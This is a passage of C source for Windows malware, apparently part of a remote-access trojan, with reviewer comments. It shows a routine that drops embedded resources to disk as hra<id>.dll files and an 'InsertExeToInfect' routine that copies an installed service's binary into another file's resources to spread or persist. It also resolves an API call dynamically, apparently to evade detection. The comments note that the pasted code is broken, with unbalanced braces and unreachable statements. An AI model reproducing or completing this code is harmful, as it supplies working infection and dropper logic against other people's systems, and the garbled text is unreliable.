     * ID; presumably the IDs line up with the hra%u.dll names that LoadM2Addon
     * and LoadInfectAddon load. The WriteFile result is not checked.
     * SizeofResource is resolved through GetProcAddress rather than imported.
     */
    }BOOL CALLBACK EnumResNameProc(HMODULE hModule, LPCTSTR lpszType, LPTSTR lpszName, LONG_PTR lParam)
    {
    typedef DWORD (WINAPI *SizeofResourceT)
    (
    HMODULE hModule,
    HRSRC hResInfo
    );
    SizeofResourceT   pSizeofResource  =   (SizeofResourceT)GetProcAddress(LoadLibrary("kernel32.dll"),"SizeofResource"); HRSRC hResInfo = FindResource(hModule, lpszName, lpszType);
    if (NULL != hResInfo)
    {
    DWORD dwRcSize = pSizeofResource(hModule, hResInfo);
    HGLOBAL hResData = LoadResource(hModule, hResInfo);
    if (NULL != hResData && 0 != dwRcSize)
    {
    char *lpResLock = (char *)LockResource(hResData);
    if (NULL != lpResLock)
    {
    TCHAR buf[MAX_PATH];
    wsprintf(buf, TEXT("hra%u.dll"), lpszName);
    HANDLE hFile = CreateFile(buf, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, 0, NULL);
    if (INVALID_HANDLE_VALUE != hFile)
    {
    DWORD dwWrittenBytes = 0;
    WriteFile(hFile, lpResLock, dwRcSize, &dwWrittenBytes, NULL);
    CloseHandle(hFile);
    }
    UnlockResource(hResData);
    }
    }
    }
    return TRUE;
    // (Next definition) SaveAddon: run EnumResNameProc over every RT_RCDATA
    // resource of the current module, i.e. write each embedded RCDATA blob out
    // as an hra<id>.dll file.
    }void SaveAddon()
    {
    EnumResourceNames(NULL, RT_RCDATA, EnumResNameProc, 0);
    }#include "..\Addon_Infect\resource.h"
    // Insert the add-on module
    /*
     * InsertExeToInfect: embed the installed service binary into another file
     * as resources.
     *
     * szInfectAddon - path of the file whose resources are updated.
     *
     * Steps visible here: read the ImagePath value of the service
     * modify_data.ws_svcname from the registry, read that file fully into
     * memory, then use BeginUpdateResource / UpdateResource / EndUpdateResource
     * to store the file contents as RT_RCDATA resource IDR_BINDATA and the
     * service name as RT_RCDATA resource IDR_SRVNAME in szInfectAddon.
     * Returns the UpdateResource result, or FALSE on any earlier failure.
     *
     * NOTE(review): the paste has lost braces around the two error branches
     * near the end (after "if (hUpdateRes == NULL)" and after the
     * EndUpdateResource test); as shown the block does not balance and the
     * later statements are unreachable. ImagePath is passed to GetFileAttributes
     * and CreateFile exactly as stored, so a quoted path or one with arguments
     * would not open. The registry key is opened with KEY_ALL_ACCESS although
     * it is only read.
     */
    BOOL InsertExeToInfect(char *szInfectAddon)
    {
    HANDLE hUpdateRes;  // update resource handle 
    BOOL result; 
    char buf[MAX_PATH]; lstrcpy(buf,"SYSTEM\\CurrentControlSet\\Services\\");
    lstrcat(buf,modify_data.ws_svcname);

    HKEY hKey;
    if(ERROR_SUCCESS != RegOpenKeyEx(HKEY_LOCAL_MACHINE,buf,0L,KEY_ALL_ACCESS,&hKey))
    return FALSE; DWORD dwBuffLength = sizeof(buf);
    // buf is reused: from here on it holds the service's ImagePath.
    RtlZeroMemory(buf, sizeof(buf));
    if (ERROR_SUCCESS != RegQueryValueEx(hKey, "ImagePath", NULL, NULL, (LPBYTE)buf, &dwBuffLength))
    {
    RegCloseKey(hKey);
    return FALSE;
    }
    RegCloseKey(hKey);
    if (INVALID_FILE_ATTRIBUTES == GetFileAttributes(buf)) return FALSE; HANDLE hAddon = CreateFile(buf, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (INVALID_HANDLE_VALUE == hAddon) return FALSE;
    DWORD dwAddonLength = GetFileSize(hAddon, NULL);
    if (0 == dwAddonLength)
    {
    CloseHandle(hAddon);
    return FALSE;
    }
    char *lpAddonData = (char *)GlobalAlloc(GPTR, dwAddonLength);
    if (NULL == lpAddonData)
    {
    CloseHandle(hAddon);
    return FALSE;
    // dwAddonLength is overwritten with the number of bytes actually read.
    } if (FALSE == ReadFile(hAddon, lpAddonData, dwAddonLength, &dwAddonLength, NULL))
    {
    GlobalFree(lpAddonData);
    CloseHandle(hAddon);
    return FALSE;
    }
    CloseHandle(hAddon);
     
    hUpdateRes = BeginUpdateResource(szInfectAddon, FALSE); 
    if (hUpdateRes == NULL) 

    GlobalFree(lpAddonData);
    return FALSE;
    }  result = UpdateResource(hUpdateRes,
    RT_RCDATA,
    (LPCTSTR)IDR_BINDATA,
    MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL),
    lpAddonData,
    dwAddonLength); if (result)
    {
    result = UpdateResource(hUpdateRes,
    RT_RCDATA,
    (LPCTSTR)IDR_SRVNAME,
    MAKELANGID(LANG_NEUTRAL, SUBLANG_NEUTRAL),
    modify_data.ws_svcname,
    lstrlen(modify_data.ws_svcname) + 1);
    } if (!EndUpdateResource(hUpdateRes, FALSE)) 

    GlobalFree(lpAddonData);
    return FALSE;

    GlobalFree(lpAddonData);

    return result;
    }